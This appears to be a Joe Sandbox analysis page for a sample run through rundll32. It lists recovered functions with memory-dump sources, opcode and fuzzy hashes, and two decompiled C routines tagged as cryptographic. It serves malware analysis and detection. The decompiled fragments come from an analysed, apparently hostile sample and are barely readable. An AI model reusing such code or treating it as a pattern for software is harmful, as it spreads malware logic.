                                        0x21ef305f73d
                                        0x21ef305f753
                                        0x21ef305f756
                                        0x21ef305f75b
                                        0x21ef305f768
                                        0x21ef305f771
                                        0x21ef305f77a
                                        0x21ef305f787
                                        0x21ef305f78f
                                        0x21ef305f794
                                        0x21ef305f798
                                        0x21ef305f79e
                                        0x21ef305f7a2
                                        0x21ef305f7a7
                                        0x21ef305f7b5
                                        0x21ef305f7c4
                                        0x21ef305f7df
                                        0x21ef305f7e1
                                        0x21ef305f7e4
                                        0x21ef305f7e8
                                        0x21ef305f7f0
                                        0x21ef305f7f7
                                        0x21ef305f7fa
                                        0x21ef305f7fd
                                        0x21ef305f803
                                        0x21ef305f806
                                        0x21ef305f80d
                                        0x21ef305f80f
                                        0x21ef305f813
                                        0x21ef305f819
                                        0x21ef305f821
                                        0x21ef305f82e
                                        0x21ef305f833
                                        0x21ef305f838
                                        0x21ef305f83f
                                        0x21ef305f855
                                        0x21ef305f863
                                        0x21ef305f873
                                        0x21ef305f878
                                        0x21ef305f884
                                        0x21ef305f887
                                        0x21ef305f893
                                        0x21ef305f89e
                                        0x21ef305f8a1
                                        0x21ef305f8af
                                        0x21ef305f8b7
                                        0x21ef305f8ba
                                        0x21ef305f8c7
                                        0x21ef305f8d9
                                        0x21ef305f8e2
                                        0x21ef305f8ed
                                        0x21ef305f8f1
                                        0x21ef305f905
                                        0x21ef305f90d
                                        0x21ef305f910
                                        0x21ef305f918
                                        0x21ef305f923
                                        0x21ef305f934
                                        0x21ef305f93f
                                        0x21ef305f942
                                        0x21ef305f94f
                                        0x21ef305f952
                                        0x21ef305f960
                                        0x21ef305f966
                                        0x21ef305f96a
                                        0x21ef305f971
                                        0x21ef305f979
                                        0x21ef305f981
                                        0x21ef305f99e
                                        0x21ef305f9a0
                                        0x21ef305f9a4
                                        0x21ef305f9ac
                                        0x21ef305f9b5
                                        0x21ef305f9d3

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4374c69910e2451296d904c00044204cac524f70e87352413a2621000c528a3c
                                        • Instruction ID: fccb6a4768f053be4b0cf76f7d54016ff34329a1f687dcc8a586564adce685c7
                                        • Opcode Fuzzy Hash: 4374c69910e2451296d904c00044204cac524f70e87352413a2621000c528a3c
                                        • Instruction Fuzzy Hash: 4171C4736147D8C6DB518F79AC0439ABFA0F355F98F498216DE888BB89DA3CC406D750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF305DD10 Relevance: .2, Instructions: 185COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9d13619e0c5c8d2e7efad3f7b247b2a17b77eeffd675606f158e5499028cd542
                                        • Instruction ID: 1cbf59286dba0e8a5a8923754f1978f972df3e99d16f96e8a0b37739bac5949a
                                        • Opcode Fuzzy Hash: 9d13619e0c5c8d2e7efad3f7b247b2a17b77eeffd675606f158e5499028cd542
                                        • Instruction Fuzzy Hash: DC71A233219BC082DF51CB25E8582ABBBA5E7A97C4F5A8213EF8D47B59DA3CC145C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF305F130 Relevance: .2, Instructions: 182COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 30%
                                        			E0000021E21EF305F130(void* __edi, void* __rax, long long __rcx, signed char* __rdx, long long __rdi, long long __rsi, long long __rbp, signed char* __r8, void* __r9, long long __r13, long long _a16, long long _a32, long long _a40, long long _a48, signed int _a96, long long _a104, long long* _a128) {
				long long _v0;
				void* __rbx;
				void* __r14;
				signed int _t78;
				void* _t106;
				signed char _t108;
				signed char _t109;
				signed int _t113;
				signed int _t115;
				unsigned int _t125;
				unsigned int _t126;
				unsigned int _t127;
				void* _t132;
				void* _t134;
				void* _t135;
				long long _t145;
				void* _t146;
				unsigned long long _t155;
				void* _t160;
				long long _t161;
				void* _t184;
				signed char* _t185;
				unsigned long long _t192;
				void* _t194;
				signed long long _t195;
				signed long long _t196;
				signed char* _t200;
				signed char* _t201;

				_t180 = __r9;
				_t170 = __rbp;
				_t168 = __rsi;
				_t161 = __rdi;
				E0000021E21EF310C220();
				_t194 = __r9;
				_a16 =  *((intOrPtr*)(__rcx + 0x180));
				_t145 =  *((intOrPtr*)(__rcx + 0x38)) + __r9;
				_t185 = __r8;
				if (_t145 - 0xffffffe0 > 0) goto 0xf305f3ce;
				if (_t145 - __r9 < 0) goto 0xf305f3ce;
				_a104 = __rbp;
				_a48 = __rsi;
				 *((long long*)(__rcx + 0x38)) = _t145;
				if ( *((intOrPtr*)(__rcx + 0x174)) == 0) goto 0xf305f1b1;
				_t146 = __rcx + 0x40;
				E0000021E21EF3060130(_t106,  *((intOrPtr*)(__rcx + 0x174)), 0xffffffe0, __rcx, _t146, __rcx + 0x60, __rdi, __rsi, _t184, __r9);
				 *((intOrPtr*)(__rcx + 0x174)) = 0;
				_t113 =  *((intOrPtr*)(__rcx + 0x170));
				_a96 = _t113;
				if (_t113 == 0) goto 0xf305f229;
				_t132 = _t194;
				if (_t132 == 0) goto 0xf305f214;
				_t109 =  *__rdx & 0x000000ff;
				_t195 = _t194 - 1;
				_t200 =  &(__rdx[1]);
				 *_t185 =  *(_t146 + __rcx + 0x10) & 0x000000ff ^ _t109;
				 *(_t146 + __rcx + 0x40) =  *(_t146 + __rcx + 0x40) ^ _t109;
				_t115 = _t113 + 0x00000001 & 0x0000000f;
				_a96 = _t115;
				if (_t132 != 0) goto 0xf305f1e1;
				goto 0xf305f21c;
				if (_t115 != 0) goto 0xf305f3c4;
				_t155 = __rcx + 0x60;
				_t78 = E0000021E21EF3060130(_t106, _t115, 0xffffffe0, __rcx, __rcx + 0x40, _t155, _t161, _t168, _t184, _t195);
				_a40 = _t161;
				_a32 = __r13;
				_t134 = _t195 - 0xc00;
				if (_t134 < 0) goto 0xf305f2dc;
				_t163 = _t155 >> 0xb;
				_t196 = _t195 + (_t155 >> 0xb) * 0xfffff400;
				asm("o16 nop [eax+eax]");
				r9d = 0xc00;
				E0000021E21EF305FF60(_t106, _t78 * _t195 >> 0x20, _t134, (_t155 >> 0xb) * 0xfffff400, __rcx, __rcx + 0x40, __rcx + 0x60, _t163, _t168, __rbp, _t200, _t180);
				r8d = 0xc0;
				_v0 = __rcx;
				 *_a128();
				_t125 = (((( *(__rcx + 0xc) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xd) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xe) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xf) & 0x000000ff) + 0xc0;
				 *(__rcx + 0xf) = bpl;
				_t201 =  &(_t200[0xc00]);
				 *(__rcx + 0xc) = _t125 >> 0x18;
				 *(__rcx + 0xd) = _t125 >> 0x10;
				 *(__rcx + 0xe) = _t125 >> 8;
				if (_t134 != 0) goto 0xf305f270;
				_t192 = _t196 & 0xfffffff0;
				if (_t134 == 0) goto 0xf305f340;
				E0000021E21EF305FF60(_t106, _t78 * _t195 >> 0x20, _t134, (_t155 >> 0xb) * 0xfffff400, __rcx, __rcx + 0x40, __rcx + 0x60, _t192 >> 4, _t168, _t170, _t201, _t192);
				_v0 = __rcx;
				_a128();
				_t126 = _t125 + __edi;
				 *(__rcx + 0xf) = bpl;
				 *(__rcx + 0xc) = _t126 >> 0x18;
				 *(__rcx + 0xd) = _t126 >> 0x10;
				 *(__rcx + 0xe) = _t126 >> 8;
				_t135 = _t196 - _t192;
				if (_t135 == 0) goto 0xf305f39e;
				_t160 = __rcx + 0x10;
				 *((intOrPtr*)(__rcx + 0x178))();
				_t127 = _t126 + 1;
				 *(__rcx + 0xf) = bpl;
				 *(__rcx + 0xc) = _t127 >> 0x18;
				 *(__rcx + 0xd) = _t127 >> 0x10;
				 *(__rcx + 0xe) = _t127 >> 8;
				asm("o16 nop [eax+eax]");
				_t108 =  *(_t160 +  &(_t201[_t192])) & 0x000000ff;
				 *(_t160 + __rcx + 0x40) =  *(_t160 + __rcx + 0x40) ^ _t108;
				 *(_t160 +  &(( &(_t185[0xc01]))[_t192])) =  *(__rcx + _t160 + 0x10) & 0x000000ff ^ _t108;
				if (_t135 != 0) goto 0xf305f380;
				 *((intOrPtr*)(__rcx + 0x170)) = _a96 + 1;
				return 0;
			}































                                        0x21ef305f130
                                        0x21ef305f130
                                        0x21ef305f130
                                        0x21ef305f130
                                        0x21ef305f13d
                                        0x21ef305f153
                                        0x21ef305f156
                                        0x21ef305f15b
                                        0x21ef305f168
                                        0x21ef305f171
                                        0x21ef305f17a
                                        0x21ef305f187
                                        0x21ef305f18f
                                        0x21ef305f194
                                        0x21ef305f198
                                        0x21ef305f19e
                                        0x21ef305f1a2
                                        0x21ef305f1a7
                                        0x21ef305f1b5
                                        0x21ef305f1c4
                                        0x21ef305f1df
                                        0x21ef305f1e1
                                        0x21ef305f1e4
                                        0x21ef305f1e6
                                        0x21ef305f1ea
                                        0x21ef305f1ef
                                        0x21ef305f1f9
                                        0x21ef305f200
                                        0x21ef305f206
                                        0x21ef305f209
                                        0x21ef305f210
                                        0x21ef305f212
                                        0x21ef305f216
                                        0x21ef305f21c
                                        0x21ef305f224
                                        0x21ef305f229
                                        0x21ef305f22e
                                        0x21ef305f23b
                                        0x21ef305f242
                                        0x21ef305f258
                                        0x21ef305f263
                                        0x21ef305f266
                                        0x21ef305f270
                                        0x21ef305f281
                                        0x21ef305f28b
                                        0x21ef305f294
                                        0x21ef305f29c
                                        0x21ef305f29f
                                        0x21ef305f2ae
                                        0x21ef305f2b5
                                        0x21ef305f2bc
                                        0x21ef305f2c4
                                        0x21ef305f2cc
                                        0x21ef305f2d3
                                        0x21ef305f2df
                                        0x21ef305f2e3
                                        0x21ef305f2fa
                                        0x21ef305f30a
                                        0x21ef305f312
                                        0x21ef305f319
                                        0x21ef305f320
                                        0x21ef305f32a
                                        0x21ef305f332
                                        0x21ef305f33a
                                        0x21ef305f345
                                        0x21ef305f348
                                        0x21ef305f34f
                                        0x21ef305f356
                                        0x21ef305f35c
                                        0x21ef305f360
                                        0x21ef305f367
                                        0x21ef305f36f
                                        0x21ef305f377
                                        0x21ef305f37a
                                        0x21ef305f384
                                        0x21ef305f38e
                                        0x21ef305f394
                                        0x21ef305f39c
                                        0x21ef305f3a5
                                        0x21ef305f3c3

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08eb94d7faca831f58bac78c48e0fd6b6aada628af0aba11f5bd9bb4cd9b8e5b
                                        • Instruction ID: a752a80fbdb0d92d2da6fedaa3932d2f7dcd69f52d7d5963c720bb7f6df6b95a
                                        • Opcode Fuzzy Hash: 08eb94d7faca831f58bac78c48e0fd6b6aada628af0aba11f5bd9bb4cd9b8e5b
                                        • Instruction Fuzzy Hash: 6F61D3727186D8C6DB518F79AC0439A7FA0F361F98F488216DE888BB89DA38C506D754
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF303DC00 Relevance: .2, Instructions: 179COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7a3ac493c8df203e318e058fb57eff3fb40823cc6b1713a14fda8edb2e05c5b4
                                        • Instruction ID: c1677d8ec80e46bdb34d49c5c4c99936b027ec373e95bdeda85c450f33327068
                                        • Opcode Fuzzy Hash: 7a3ac493c8df203e318e058fb57eff3fb40823cc6b1713a14fda8edb2e05c5b4
                                        • Instruction Fuzzy Hash: A55137B37007848AEF549F26AD883DBA691F765BC4F95412AEE4D87F89DA7CC502C304
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF305FC80 Relevance: .2, Instructions: 173COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 35%
                                        			E0000021E21EF305FC80(void* __rax, signed int __rcx, void* __rdx, unsigned int __r8, long long __r12, long long __r13, long long __r15) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __r14;
				signed char _t66;
				unsigned int _t77;
				void* _t78;
				unsigned int _t89;
				void* _t93;
				void* _t99;
				void* _t145;
				signed long long _t148;
				long long _t151;
				void* _t158;
				void* _t159;
				void* _t162;
				void* _t164;
				signed int _t171;
				void* _t172;
				void* _t174;

				E0000021E21EF310C220();
				_t159 = _t158 - __rax;
				r14d = 0;
				 *__rcx = _t171;
				 *(__rcx + 8) = _t171;
				 *(__rcx + 0x40) = _t171;
				 *(__rcx + 0x48) = _t171;
				 *(__rcx + 0x30) = _t171;
				 *(__rcx + 0x38) = _t171;
				 *(__rcx + 0x170) = _t171;
				if (__r8 != 0xc) goto 0xf305fcde;
				asm("movsd xmm0, [edx]");
				asm("movsd [ecx], xmm0");
				 *(__rcx + 8) =  *(__rdx + 8);
				 *(__rcx + 0xf) = 1;
				goto 0xf305feba;
				 *((long long*)(_t159 + 0x58)) = _t151;
				 *(_t159 + 0x50) = __r8;
				if (__r8 - 0x10 < 0) goto 0xf305fd9a;
				 *((long long*)(_t159 + 0x60)) = __r12;
				 *((long long*)(_t159 + 0x68)) = __r13;
				 *((long long*)(_t159 + 0x20)) = __r15;
				_t148 = __r8 + (__r8 >> 4) * 0xfffffff0;
				_t174 = __rcx + 0xf;
				_t162 =  ~__rcx + __rdx;
				if (__rcx - _t162 + _t174 > 0) goto 0xf305fd60;
				_t93 = _t174 - __rdx;
				if (_t93 < 0) goto 0xf305fd60;
				asm("o16 nop [eax+eax]");
				 *__rcx =  *__rcx ^  *(_t162 + __rcx) & 0x000000ff;
				if (_t93 != 0) goto 0xf305fd40;
				goto 0xf305fd70;
				asm("o16 nop [eax+eax]");
				asm("movdqu xmm1, [ebx]");
				asm("movdqu xmm0, [edi]");
				asm("pxor xmm1, xmm0");
				asm("movdqu [ebx], xmm1");
				E0000021E21EF3060130(_t78, _t93, __rcx + 1, __rcx, __rcx, __rcx + 0x60, __rdx, _t148, _t164, _t171);
				_t145 = __rdx + 0x10;
				if (_t93 != 0) goto 0xf305fd20;
				if (_t148 == 0) goto 0xf305fe3c;
				if (_t148 - 0x20 < 0) goto 0xf305fe04;
				if (__rcx - _t145 - 1 + _t148 > 0) goto 0xf305fdc1;
				if (__rcx - 1 + _t148 - _t145 >= 0) goto 0xf305fe04;
				asm("movdqu xmm0, [eax]");
				_t172 = _t171 + 0x20;
				asm("movdqu xmm1, [eax+ecx]");
				asm("pxor xmm1, xmm0");
				asm("movdqu [eax-0x20], xmm1");
				asm("movdqu xmm1, [ecx+eax-0x10]");
				asm("movdqu xmm0, [eax-0x10]");
				asm("pxor xmm1, xmm0");
				asm("movdqu [eax-0x10], xmm1");
				if (_t172 - (_t148 & 0xffffffe0) < 0) goto 0xf305fdd1;
				_t99 = _t172 - _t148;
				if (_t99 >= 0) goto 0xf305fe30;
				_t146 = _t145 - __rcx;
				_t131 = _t172 + __rcx;
				asm("o16 nop [eax+eax]");
				 *_t131 =  *(_t172 + __rcx) ^  *(_t145 - __rcx + _t172 + __rcx) & 0x000000ff;
				if (_t99 != 0) goto 0xf305fe20;
				_t66 = E0000021E21EF3060130(_t78, _t99, __rcx + 0x20, __rcx, __rcx, __rcx + 0x60, _t145 - __rcx, _t148 - _t172 - 1, _t164, _t172);
				 *(__rcx + 0xf) =  *(__rcx + 0xf) ^ bpl;
				 *(__rcx + 8) =  *(__rcx + 8) ^ _t66;
				 *(__rcx + 9) =  *(__rcx + 9) ^ _t66;
				 *(__rcx + 0xa) =  *(__rcx + 0xa) ^ _t66;
				 *(__rcx + 0xb) =  *(__rcx + 0xb) ^ _t66;
				 *(__rcx + 0xc) =  *(__rcx + 0xc) ^ _t66;
				 *(__rcx + 0xd) =  *(__rcx + 0xd) ^ _t66;
				 *(__rcx + 0xe) =  *(__rcx + 0xe) ^ _t66;
				E0000021E21EF3060130(_t78, _t99,  *(_t159 + 0x50) << 3 >> 8, __rcx, __rcx, __rcx + 0x60, _t146, _t148 - _t172 - 1, _t164, _t172);
				 *((intOrPtr*)(__rcx + 0x178))();
				_t89 = (((( *(__rcx + 0xc) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xd) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xe) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xf) & 0x000000ff) + 1;
				 *(__rcx + 0xf) = dil;
				 *(__rcx + 0xc) = _t89 >> 0x18;
				 *(__rcx + 0xd) = _t89 >> 0x10;
				_t77 = _t89 >> 8;
				 *(__rcx + 0xe) = _t77;
				return _t77;
			}























                                        0x21ef305fc8b
                                        0x21ef305fc90
                                        0x21ef305fc93
                                        0x21ef305fc99
                                        0x21ef305fc9f
                                        0x21ef305fca6
                                        0x21ef305fcaa
                                        0x21ef305fcae
                                        0x21ef305fcb2
                                        0x21ef305fcb6
                                        0x21ef305fcc1
                                        0x21ef305fcc3
                                        0x21ef305fccb
                                        0x21ef305fcd2
                                        0x21ef305fcd5
                                        0x21ef305fcd9
                                        0x21ef305fcde
                                        0x21ef305fce6
                                        0x21ef305fcef
                                        0x21ef305fcf5
                                        0x21ef305fd08
                                        0x21ef305fd0d
                                        0x21ef305fd12
                                        0x21ef305fd15
                                        0x21ef305fd20
                                        0x21ef305fd2b
                                        0x21ef305fd2d
                                        0x21ef305fd30
                                        0x21ef305fd3a
                                        0x21ef305fd45
                                        0x21ef305fd4f
                                        0x21ef305fd51
                                        0x21ef305fd57
                                        0x21ef305fd60
                                        0x21ef305fd64
                                        0x21ef305fd68
                                        0x21ef305fd6c
                                        0x21ef305fd77
                                        0x21ef305fd7c
                                        0x21ef305fd84
                                        0x21ef305fd9d
                                        0x21ef305fda7
                                        0x21ef305fdba
                                        0x21ef305fdbf
                                        0x21ef305fdd1
                                        0x21ef305fdd5
                                        0x21ef305fdd9
                                        0x21ef305fde2
                                        0x21ef305fde6
                                        0x21ef305fdeb
                                        0x21ef305fdf1
                                        0x21ef305fdf6
                                        0x21ef305fdfa
                                        0x21ef305fe02
                                        0x21ef305fe04
                                        0x21ef305fe07
                                        0x21ef305fe09
                                        0x21ef305fe0c
                                        0x21ef305fe17
                                        0x21ef305fe24
                                        0x21ef305fe2e
                                        0x21ef305fe37
                                        0x21ef305fe44
                                        0x21ef305fe52
                                        0x21ef305fe5c
                                        0x21ef305fe66
                                        0x21ef305fe70
                                        0x21ef305fe7a
                                        0x21ef305fe84
                                        0x21ef305fe8e
                                        0x21ef305fe91
                                        0x21ef305fec8
                                        0x21ef305fece
                                        0x21ef305fed2
                                        0x21ef305fed9
                                        0x21ef305fee1
                                        0x21ef305fee6
                                        0x21ef305fee9
                                        0x21ef305fef5

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad8bd55bc2d697952041d5995c24693b42f9b19df9ac9196bf8c164706034983
                                        • Instruction ID: c0b5d74b7fd05acadd6d670d4621f5bc2b4f23a64c87de87be4d20c054671c70
                                        • Opcode Fuzzy Hash: ad8bd55bc2d697952041d5995c24693b42f9b19df9ac9196bf8c164706034983
                                        • Instruction Fuzzy Hash: 1B61D333705BD886DB428F3D984829DBBA1E795F94F598222DF885BB46DA3CC147D310
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30530F0 Relevance: .2, Instructions: 171COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cad4d707cdcf66bf8c8a407a7550ef33074f8a8de2a765818179ff5dbb5d0ebc
                                        • Instruction ID: 09d9b60defae3106877f2c5392eab79e72bfb376da93602d288e6fc0a8b68006
                                        • Opcode Fuzzy Hash: cad4d707cdcf66bf8c8a407a7550ef33074f8a8de2a765818179ff5dbb5d0ebc
                                        • Instruction Fuzzy Hash: DF6191231082D09ED7698F3968503FE7FA0E3A6785F48815AFED587F4AD92CC605DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3061100 Relevance: .2, Instructions: 166COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c59fd68cd1a9d3053e8280147ff4d0107e97cb229c22ffa76a228d6472e6e573
                                        • Instruction ID: a0f36b63b00dd12344f4fabda7d004f2a571dbcfe5a23d3d35029945b01fd33e
                                        • Opcode Fuzzy Hash: c59fd68cd1a9d3053e8280147ff4d0107e97cb229c22ffa76a228d6472e6e573
                                        • Instruction Fuzzy Hash: F0618973B11BA589FB01CBB8D8446DD37B0F769B88B15961ADF8963B49EB38C156C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF305E3B0 Relevance: .2, Instructions: 164COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 362dbc9eeb5c99ac1df2bbf3c8f9ebe491964f16d7df04ea48ea104513369828
                                        • Instruction ID: c5a490b8bf817e895c41a52ad9c1ad008fdea7a30402a35c5b3a5d67a6bfaa89
                                        • Opcode Fuzzy Hash: 362dbc9eeb5c99ac1df2bbf3c8f9ebe491964f16d7df04ea48ea104513369828
                                        • Instruction Fuzzy Hash: 1251D6672056D08ADB618F5D98443AFBFA0F35AB98F498126DFDD83B46DA38C407C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3057470 Relevance: .2, Instructions: 161COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e613738db0c37cfd352357b758b05b90f9e3dcdadb75fcc89acd1c6ef00e98c3
                                        • Instruction ID: b51821f9ffd3c040afdfac8128e3fd37a7928e3aec3d4975781135142fe49072
                                        • Opcode Fuzzy Hash: e613738db0c37cfd352357b758b05b90f9e3dcdadb75fcc89acd1c6ef00e98c3
                                        • Instruction Fuzzy Hash: 7D5183231092D09ED7198E3D58501BE7FE0E3A2745B49826EFFD28BF8AC52CC605DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF305C4C0 Relevance: .2, Instructions: 161COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0869c963b2239effac01cac6ffedc00f42a0b797d1e3c6059e57ae110e09d191
                                        • Instruction ID: 11fd9989ab59dd9653313bd3ebdb1ad84a48c24c965ca7f78bf6ecfab1685761
                                        • Opcode Fuzzy Hash: 0869c963b2239effac01cac6ffedc00f42a0b797d1e3c6059e57ae110e09d191
                                        • Instruction Fuzzy Hash: 845173231092D0AED759CE7D58501BE7FE0E3A2745B49826EFFD18BE8AC52CC605DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3058520 Relevance: .2, Instructions: 161COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 736f93972e8237637be9ca013349526ad05d3318879f57f6b4e39937a9a70ec1
                                        • Instruction ID: d868e310b9bdd1f6590075858228ea8a3b6da11bfc32764ec37fcd5f63ee3d2b
                                        • Opcode Fuzzy Hash: 736f93972e8237637be9ca013349526ad05d3318879f57f6b4e39937a9a70ec1
                                        • Instruction Fuzzy Hash: A751A6236092D09ED7198F3D58545BE7FE0E3A1745B48826AFFD28BE8AC52CC605DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3059A40 Relevance: .2, Instructions: 161COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe31fad5fdc0498e094837f58abc7397dbf767651227809bd65f84cb5623107f
                                        • Instruction ID: 713c1f4260a2992cba1238a9fb63bd1c6f19dd03fbd379e03ae224ae7a284d2a
                                        • Opcode Fuzzy Hash: fe31fad5fdc0498e094837f58abc7397dbf767651227809bd65f84cb5623107f
                                        • Instruction Fuzzy Hash: 005196231092D09ED7198E3D58511BE7FE0E3A2745B49826EFFD28BF8AC52CC605DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3053C00 Relevance: .2, Instructions: 158COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a9e421be41d4762907c32dd10f6b9d9651c366b793c91512c93e9bf6da2d4c97
                                        • Instruction ID: fc68249a021a9b685663550b78f815d8600d637ae547fb5317ecfd387addd2ba
                                        • Opcode Fuzzy Hash: a9e421be41d4762907c32dd10f6b9d9651c366b793c91512c93e9bf6da2d4c97
                                        • Instruction Fuzzy Hash: 4751B363B252E48EF7018BBD58009ED3FB4E326788B44414ADFD4A7F46C638D526C761
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3061EF0 Relevance: .2, Instructions: 156COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e9b77d70e071715dd45e14d8d3089086edf57566d60ee2aa47867f986d101c6
                                        • Instruction ID: 3be6312b7011293e13c0a0c2462cfc2bd9d149ed7def59c7df398f7d7b5a6641
                                        • Opcode Fuzzy Hash: 5e9b77d70e071715dd45e14d8d3089086edf57566d60ee2aa47867f986d101c6
                                        • Instruction Fuzzy Hash: BA515E72305F8896DE58CB2AE94439AB3A8F759B88F554026DF8D47B65EF38D066C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

